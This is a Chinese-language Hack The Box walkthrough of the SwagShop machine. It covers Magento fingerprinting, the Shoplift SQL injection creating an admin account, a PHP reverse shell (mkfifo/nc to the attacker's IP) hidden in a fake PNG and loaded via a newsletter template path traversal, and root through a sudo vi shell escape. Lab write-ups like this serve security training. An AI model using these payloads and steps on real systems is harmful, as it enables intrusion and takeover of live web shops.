SwagShop-htb-writeup

0x00 靶场技能介绍

章节技能：magescan工具使用、Magento-Shoplift-SQLI、OSVDB-126445、Magento管理后台模版上传获取shell、sudo错配vi提权

参考链接：https://0xdf.gitlab.io/2019/09/28/htb-swagshop.html

参考链接：https://0xrick.github.io/hack-the-box/swagshop/

0x01 用户权限获取

1、获取靶机IP地址：10.10.10.140

2、端口扫描

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sC -sV -p- --min-rate 500 10.10.10.140 
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-07 15:01 CST
Nmap scan report for 10.10.10.140
Host is up (0.30s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to http://swagshop.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.28 seconds

3、写入本地hosts文件

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.140 swagshop.htb" | sudo tee -a /etc/hosts
10.10.10.140 swagshop.htb

4、目录扫描，建议使用多个目录扫描器进行扫描

┌──(kali㉿kali)-[~/桌面]
└─$ gobuster dir -u http://10.10.10.140 -x php --wordlist=/usr/share/dirb/wordlists/common.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.140
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 277]
/.hta.php             (Status: 403) [Size: 277]
/.hta                 (Status: 403) [Size: 277]
/.htaccess.php        (Status: 403) [Size: 277]
/.htpasswd.php        (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/app                  (Status: 301) [Size: 310] [--> http://10.10.10.140/app/]                                                                            
/api.php              (Status: 200) [Size: 37]
/cron.php             (Status: 200) [Size: 0]
/errors               (Status: 301) [Size: 313] [--> http://10.10.10.140/errors/]                                                                         
/favicon.ico          (Status: 200) [Size: 1150]
/includes             (Status: 301) [Size: 315] [--> http://10.10.10.140/includes/]
/index.php            (Status: 302) [Size: 0] [--> http://swagshop.htb/]
/index.php            (Status: 302) [Size: 0] [--> http://swagshop.htb/]
/install.php          (Status: 200) [Size: 44]
/js                   (Status: 301) [Size: 309] [--> http://10.10.10.140/js/]
/lib                  (Status: 301) [Size: 310] [--> http://10.10.10.140/lib/]
/media                (Status: 301) [Size: 312] [--> http://10.10.10.140/media/]
/pkginfo              (Status: 301) [Size: 314] [--> http://10.10.10.140/pkginfo/]
Progress: 6862 / 9230 (74.34%)[ERROR] Get "http://10.10.10.140/readme": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/server-status        (Status: 403) [Size: 277]
/shell                (Status: 301) [Size: 312] [--> http://10.10.10.140/shell/]
/skin                 (Status: 301) [Size: 311] [--> http://10.10.10.140/skin/]
/var                  (Status: 301) [Size: 310] [--> http://10.10.10.140/var/]
Progress: 9228 / 9230 (99.98%)
===============================================================
Finished
===============================================================

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://swagshop.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_swagshop.htb/__23-12-07_15-20-19.txt

Target: http://swagshop.htb/

[15:20:19] Starting: 
[15:20:27] 301 -  309B  - /js  ->  http://swagshop.htb/js/                  
[15:20:32] 403 -  277B  - /.ht_wsr.txt                                      
[15:20:32] 403 -  277B  - /.htaccess.bak1                                   
[15:20:32] 403 -  277B  - /.htaccess.orig                                   
[15:20:33] 403 -  277B  - /.htaccess.sample                                 
[15:20:33] 403 -  277B  - /.htaccess.save
[15:20:33] 403 -  277B  - /.htaccess_extra                                  
[15:20:33] 403 -  277B  - /.htaccess_orig
[15:20:33] 403 -  277B  - /.htaccess_sc
[15:20:33] 403 -  277B  - /.htaccessBAK
[15:20:33] 403 -  277B  - /.htaccessOLD
[15:20:33] 403 -  277B  - /.htaccessOLD2
[15:20:33] 403 -  277B  - /.html                                            
[15:20:33] 403 -  277B  - /.htm
[15:20:33] 403 -  277B  - /.htpasswd_test                                   
[15:20:33] 403 -  277B  - /.htpasswds
[15:20:33] 403 -  277B  - /.httr-oauth
[15:20:36] 403 -  277B  - /.php                                             
[15:20:37] 403 -  277B  - /.php3                                            
[15:21:15] 200 -   37B  - /api.php                                          
[15:21:15] 301 -  310B  - /app  ->  http://swagshop.htb/app/                
[15:21:15] 200 -  525B  - /app/                                             
[15:21:16] 200 -    1KB - /app/etc/config.xml                               
[15:21:16] 200 -  895B  - /app/etc/local.xml.template                       
[15:21:16] 200 -  998B  - /app/etc/local.xml                                
[15:21:16] 200 -    3KB - /app/etc/local.xml.additional
[15:21:33] 200 -  717B  - /cron.sh                                          
[15:21:33] 200 -    0B  - /cron.php
[15:21:42] 301 -  313B  - /errors  ->  http://swagshop.htb/errors/          
[15:21:42] 200 -  574B  - /errors/                                          
[15:21:44] 200 -    1KB - /favicon.ico                                      
[15:21:47] 404 -    0B  - /get.php                                          
[15:21:53] 200 -  458B  - /includes/                                        
[15:21:53] 301 -  315B  - /includes  ->  http://swagshop.htb/includes/
[15:21:55] 200 -   44B  - /install.php                                      
[15:21:55] 404 -   14KB - /index.php/login/                                 
[15:21:56] 200 -   44B  - /install.php?profile=default                      
[15:21:58] 200 -  701B  - /js/tiny_mce/                                     
[15:21:58] 301 -  318B  - /js/tiny_mce  ->  http://swagshop.htb/js/tiny_mce/
[15:21:58] 404 -   52B  - /js/                                              
[15:22:00] 200 -  554B  - /lib/                                             
[15:22:00] 301 -  310B  - /lib  ->  http://swagshop.htb/lib/                
[15:22:01] 200 -    4KB - /LICENSE.txt                                      
[15:22:07] 301 -  312B  - /media  ->  http://swagshop.htb/media/            
[15:22:07] 200 -  529B  - /media/
[15:22:19] 200 -  886B  - /php.ini.sample                                   
[15:22:24] 301 -  314B  - /pkginfo  ->  http://swagshop.htb/pkginfo/        
[15:22:34] 403 -  277B  - /server-status                                    
[15:22:34] 403 -  277B  - /server-status/                                   
[15:22:35] 200 -  571KB - /RELEASE_NOTES.txt                                
[15:22:36] 200 -  504B  - /shell/                                           
[15:22:36] 301 -  312B  - /shell  ->  http://swagshop.htb/shell/            
[15:22:39] 301 -  311B  - /skin  ->  http://swagshop.htb/skin/              
[15:22:54] 301 -  310B  - /var  ->  http://swagshop.htb/var/                
[15:22:54] 200 -  409B  - /var/backups/                                     
[15:22:54] 200 -  580B  - /var/                                             
[15:22:54] 200 -  571B  - /var/cache/                                       
[15:22:54] 200 -    1KB - /var/package/                                     

Task Completed

5、使用 magescan.phar 获取到网站的一些信息

┌──(kali㉿kali)-[~/桌面/htb-tools]
└─$ php magescan.phar scan:all swagshop.htb
Scanning http://swagshop.htb/...

  Magento Information  

+-----------+------------------+
| Parameter | Value            |
+-----------+------------------+
| Edition   | Community        |
| Version   | 1.9.0.0, 1.9.0.1 |
+-----------+------------------+

6、谷歌搜索到一个漏洞利用，这个版本号是因为我在目录扫描时被一个文档给误导了，但是结果是可以的。

https://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py

7、成功获取到一个拥有管理员权限的账号

┌──(kali㉿kali)-[~/桌面]
└─$ python2 1.py http://swagshop.htb/
WORKED
Check http://swagshop.htb/admin with creds ypwq:123

8、在这里介绍下，官方演练是让通过一个Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution这个漏洞进行提权的，但是我运行后并没有成功获取到权限

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit magento 1.7.0.2      
------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
Magento < 2.0.6 - Arbitrary Unserialize /  | php/webapps/39838.php
Magento CE < 1.9.0.1 - (Authenticated) Rem | php/webapps/37811.py
------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                             
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m 37811       
  Exploit: Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution
      URL: https://www.exploit-db.com/exploits/37811
     Path: /usr/share/exploitdb/exploits/php/webapps/37811.py
    Codes: OSVDB-126445
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/桌面/37811.py

┌──(kali㉿kali)-[~/桌面]
└─$ curl -s 10.10.10.140/app/etc/local.xml | grep date
            <date><![CDATA[Wed, 08 May 2019 07:23:09 +0000]]></date>

# Config.
username = 'ypwq'
password = '123'
php_function = 'system'  # Note: we can only pass 1 argument to the function
install_date = 'Wed, 08 May 2019 07:23:09 +0000'  # This needs to be the exact date from /app/etc/local.xml

┌──(kali㉿kali)-[~/桌面]
└─$ python2 37811.py 'http://10.10.10.140/index.php/admin' "uname -a"
Traceback (most recent call last):
  File "37811.py", line 55, in <module>
    br['login[username]'] = username
  File "/home/kali/.local/lib/python2.7/site-packages/mechanize/_mechanize.py", line 809, in __setitem__
    self.form[name] = val
  File "/home/kali/.local/lib/python2.7/site-packages/mechanize/_form_controls.py", line 1963, in __setitem__
    control = self.find_control(name)
  File "/home/kali/.local/lib/python2.7/site-packages/mechanize/_form_controls.py", line 2355, in find_control
    return self._find_control(name, type, kind, id, label, predicate, nr)
  File "/home/kali/.local/lib/python2.7/site-packages/mechanize/_form_controls.py", line 2446, in _find_control
    description)
mechanize._form_controls.AmbiguityError: more than one control matching name 'login[username]'

9、我这里各种修改管理员路径，但是就是无法成功获取到shell，所以参考其他文章，我更换了策略，通过一个我很不喜欢的方式进行了获取权限。

10、进入到后台地址：http://swagshop.htb/index.php/admin/index/index/

账号密码：ypwq:123

11、在模板设置中允许符号链接：system -> Configuration -> Advanced -> Developer -> Template Settings -> Template Settings：yes

12、本地生成一个空白png图像php并向其回显反向 shell

┌──(kali㉿kali)-[~/桌面]
└─$ echo '<?php' >> shell.php.png
┌──(kali㉿kali)-[~/桌面]
└─$ echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 10086 >/tmp/f");' >> shell.php.png
┌──(kali㉿kali)-[~/桌面]
└─$ echo '?>' >> shell.php.png

13、图像作为类别缩略图上传：Catalog -> Manage Categories 按图设置并上传shell图片，再点击保存

14、通过创建新闻模版，加载该模版：Newsletter -> Newsletter Templates -> Add New Template ，设置加载地址

block type='core/template' template='../../../../../../media/catalog/category/shell.php.png'

15、设置监听，再加载刚才呢个模版进行获取到反弹shell，至此成功获取到第一个user.txt

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086                  
listening on [any] 10086 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.140] 55206
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/var/www/html
$ ls
LICENSE.html
LICENSE.txt
LICENSE_AFL.txt
RELEASE_NOTES.txt
api.php
app
cron.php
cron.sh
errors
favicon.ico
get.php
includes
index.php
index.php.sample
install.php
js
lib
mage
media
php.ini.sample
pkginfo
shell
skin
var
$ ls la /home
ls: cannot access 'la': No such file or directory
/home:
haris
$ ls -la /home/
total 12
drwxr-xr-x  3 root  root  4096 Nov 12  2021 .
drwxr-xr-x 23 root  root  4096 Oct 13 13:03 ..
drwxr-xr-x  4 haris haris 4096 Oct 16 07:32 haris
$ cat /home/haris/user.txt
a6d11617ad66133747dd3bd31e6476de
$ whoami
www-data
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@swagshop:/var/www/html$

0x02 系统权限获取

16、通过查看sudo -l 发现可以直接提权

www-data@swagshop:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
www-data@swagshop:/var/www/html$ sudo /usr/bin/vi /var/www/html/../../../root/root.txt
<do /usr/bin/vi /var/www/html/../../../root/root.txt

E558: Terminal entry not found in terminfo
'unknown' not known. Available builtin terminals are:
    builtin_amiga
    builtin_beos-ansi
    builtin_ansi
    builtin_pcansi
    builtin_win32
    builtin_vt320
    builtin_vt52
    builtin_xterm
    builtin_iris-ansi
    builtin_debug
    builtin_dumb
defaulting to 'ansi'
^[:qf77f5ee41637342aac0ceb4ca809
~
~
~
www-data@swagshop:/var/www/html$

sudo /usr/bin/vi /var/www/html/a

:set shell=/bin/sh
:shell

www-data@swagshop:/var/www/html$ sudo /usr/bin/vi /var/www/html/a
sudo /usr/bin/vi /var/www/html/a

E558: Terminal entry not found in terminfo
'unknown' not known. Available builtin terminals are:
    builtin_amiga
    builtin_beos-ansi
    builtin_ansi
    builtin_pcansi
    builtin_win32
    builtin_vt320
    builtin_vt52
    builtin_xterm
    builtin_iris-ansi
    builtin_debug
    builtin_dumb
defaulting to 'ansi'
:shell shell=/bin/sh
~
~
~
:shell
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /roo/root.txt
cd /roo/root.txt
/bin/sh: 2: cd: can't cd to /roo/root.txt
# cat /root/root.txt
cat /root/root.txt
00edf77f5ee41637342aac0ceb4ca809
# 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/188